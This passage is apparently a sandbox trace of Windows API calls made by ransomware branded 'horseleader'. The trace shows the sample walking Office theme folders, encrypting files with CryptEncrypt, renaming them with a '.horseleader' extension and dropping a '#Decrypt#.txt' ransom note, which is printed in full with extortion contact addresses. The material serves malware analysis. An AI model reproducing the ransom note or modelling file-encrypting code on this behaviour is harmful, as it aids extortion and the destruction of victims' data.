(in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.194] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, 
ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x80f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.194] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.195] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\#Decrypt#.txt") returned 82 [0246.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.195] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.195] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.197] lstrlenA (lpString="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") returned 1368 [0246.197] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.197] CloseHandle (hObject=0x158) returned 1 [0246.197] GetProcessHeap () returned 0x780000 [0246.197] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.197] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0246.197] lstrcmpiW (lpString1="BLUEPRNT", lpString2="Windows") returned -1 [0246.197] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned 68 [0246.197] lstrcmpW (lpString1="BLUEPRNT", lpString2=".") returned 1 [0246.197] lstrcmpW (lpString1="BLUEPRNT", lpString2="..") returned 1 [0246.197] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.198] GetProcessHeap () returned 0x780000 [0246.198] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.198] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*") returned 70 [0246.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.199] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\.") returned 70 [0246.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.199] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.200] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\..") returned 71 [0246.200] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0246.200] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.200] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f3db00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7f3db00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xda86, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUEPRNT.ELM", cAlternateFileName="")) returned 1 [0246.200] lstrcmpiW (lpString1="BLUEPRNT.ELM", lpString2="Windows") returned -1 [0246.200] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned 81 [0246.200] StrStrIW (lpFirst="BLUEPRNT.ELM", lpSrch=".horseleader") returned 0x0 [0246.200] lstrcmpW (lpString1="BLUEPRNT.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.200] lstrcmpW (lpString1="BLUEPRNT.ELM", lpString2="_uninstalling_.png") returned 1 [0246.200] lstrlenW (lpString=".testttjffg") returned 11 [0246.200] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM", lpSrch=".testttjffg") returned 0x0 [0246.200] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.200] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.201] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned 81 [0246.201] StrStrW (lpFirst="BLUEPRNT.ELM", lpSrch=".txt") returned 0x0 [0246.201] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=55942) returned 1 [0246.201] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.204] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.204] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.205] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.205] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.205] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.206] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3a86, lpOverlapped=0x0) returned 1 [0246.206] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc57a, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.206] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3a86, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3a86, lpOverlapped=0x0) returned 1 [0246.206] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.206] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.206] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.207] CloseHandle (hObject=0x1a4) returned 1 [0246.207] GetProcessHeap () returned 0x780000 [0246.207] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.207] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.horseleader") returned 93 [0246.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm.horseleader")) returned 1 [0246.208] GetProcessHeap () returned 0x780000 [0246.208] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.208] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5fbc5df0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x225, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUEPRNT.INF", cAlternateFileName="")) returned 1 [0246.208] lstrcmpiW (lpString1="BLUEPRNT.INF", lpString2="Windows") returned -1 [0246.208] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF") returned 81 [0246.208] StrStrIW (lpFirst="BLUEPRNT.INF", lpSrch=".horseleader") returned 0x0 [0246.208] lstrcmpW (lpString1="BLUEPRNT.INF", lpString2="#Decrypt#.txt") returned 1 [0246.208] lstrcmpW (lpString1="BLUEPRNT.INF", lpString2="_uninstalling_.png") returned 1 [0246.208] lstrlenW (lpString=".testttjffg") returned 11 [0246.209] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF", lpSrch=".testttjffg") returned 0x0 [0246.209] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.209] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF") returned 81 [0246.211] StrStrW (lpFirst="BLUEPRNT.INF", lpSrch=".txt") returned 0x0 [0246.211] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=549) returned 1 [0246.211] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0246.212] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.213] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0246.213] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.213] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.213] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.213] CloseHandle (hObject=0x1a4) returned 1 [0246.214] GetProcessHeap () returned 0x780000 [0246.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.214] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF.horseleader") returned 93 [0246.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf.horseleader")) returned 1 [0246.217] GetProcessHeap () returned 0x780000 [0246.217] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.217] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x785, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.217] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.217] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 80 [0246.218] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.218] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.218] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.218] lstrlenW (lpString=".testttjffg") returned 11 [0246.218] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.218] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.218] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 80 [0246.219] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.219] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1925) returned 1 [0246.219] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x785, lpOverlapped=0x0) returned 1 [0246.221] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff87b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.221] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x785, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x785, lpOverlapped=0x0) returned 1 [0246.221] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.222] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.222] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.222] CloseHandle (hObject=0x1a4) returned 1 [0246.222] GetProcessHeap () returned 0x780000 [0246.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.222] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.horseleader") returned 92 [0246.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.horseleader")) returned 1 [0246.223] GetProcessHeap () returned 0x780000 [0246.223] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6b0f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.223] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.223] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 81 [0246.223] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0246.223] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.224] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.224] lstrlenW (lpString=".testttjffg") returned 11 [0246.224] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.224] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.224] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.227] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 81 [0246.227] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.227] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=27407) returned 1 [0246.227] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.230] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.231] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
